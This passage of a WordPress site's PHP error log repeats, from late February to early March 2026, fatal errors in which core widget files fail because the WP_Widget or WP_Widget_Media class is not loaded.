Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[21-Feb-2026 00:10:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[21-Feb-2026 02:17:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[21-Feb-2026 02:17:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[21-Feb-2026 02:47:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[21-Feb-2026 03:31:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[21-Feb-2026 05:19:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[21-Feb-2026 06:47:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[21-Feb-2026 07:58:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[21-Feb-2026 18:10:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[21-Feb-2026 18:10:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[21-Feb-2026 18:10:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[21-Feb-2026 18:10:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[21-Feb-2026 18:10:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[21-Feb-2026 18:10:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[21-Feb-2026 18:10:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[21-Feb-2026 18:10:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[21-Feb-2026 18:10:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[21-Feb-2026 18:10:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[21-Feb-2026 18:10:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[21-Feb-2026 18:10:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[21-Feb-2026 18:10:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[21-Feb-2026 18:10:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[21-Feb-2026 18:10:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[21-Feb-2026 18:10:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[21-Feb-2026 18:10:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[21-Feb-2026 18:10:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[21-Feb-2026 18:10:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[21-Feb-2026 18:10:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[21-Feb-2026 18:49:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[21-Feb-2026 21:08:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[22-Feb-2026 09:06:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[22-Feb-2026 09:57:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[22-Feb-2026 12:54:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[23-Feb-2026 00:27:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[23-Feb-2026 00:45:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[23-Feb-2026 01:47:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[23-Feb-2026 01:57:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[23-Feb-2026 02:17:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[23-Feb-2026 04:15:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[23-Feb-2026 04:25:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[23-Feb-2026 05:10:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[23-Feb-2026 09:04:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[23-Feb-2026 11:37:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[23-Feb-2026 12:26:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[23-Feb-2026 13:14:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[23-Feb-2026 21:54:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[23-Feb-2026 22:54:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[24-Feb-2026 00:29:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[24-Feb-2026 01:02:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[24-Feb-2026 13:06:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[24-Feb-2026 15:47:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Feb-2026 00:10:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Feb-2026 01:08:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[25-Feb-2026 01:40:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Feb-2026 01:58:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[25-Feb-2026 02:09:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[25-Feb-2026 02:18:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[25-Feb-2026 07:10:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[25-Feb-2026 08:04:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[25-Feb-2026 08:27:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[25-Feb-2026 09:12:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[25-Feb-2026 16:51:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[25-Feb-2026 18:55:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[25-Feb-2026 19:15:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[26-Feb-2026 01:48:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[26-Feb-2026 20:41:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[27-Feb-2026 01:23:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[27-Feb-2026 02:07:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[27-Feb-2026 02:24:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[27-Feb-2026 02:27:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[27-Feb-2026 03:34:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[27-Feb-2026 04:16:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[27-Feb-2026 05:18:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[27-Feb-2026 08:59:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[27-Feb-2026 17:55:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[27-Feb-2026 19:44:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[27-Feb-2026 19:44:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[28-Feb-2026 13:47:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[01-Mar-2026 00:39:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[01-Mar-2026 01:41:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[01-Mar-2026 01:42:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[01-Mar-2026 02:36:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[01-Mar-2026 03:07:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[01-Mar-2026 03:16:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[01-Mar-2026 03:23:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[01-Mar-2026 03:27:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[01-Mar-2026 07:30:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[01-Mar-2026 08:36:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[01-Mar-2026 08:42:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[01-Mar-2026 12:55:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[01-Mar-2026 13:02:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[01-Mar-2026 22:11:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[01-Mar-2026 22:48:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Mar-2026 16:26:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[03-Mar-2026 02:46:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[03-Mar-2026 07:56:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[03-Mar-2026 08:06:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[03-Mar-2026 09:43:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
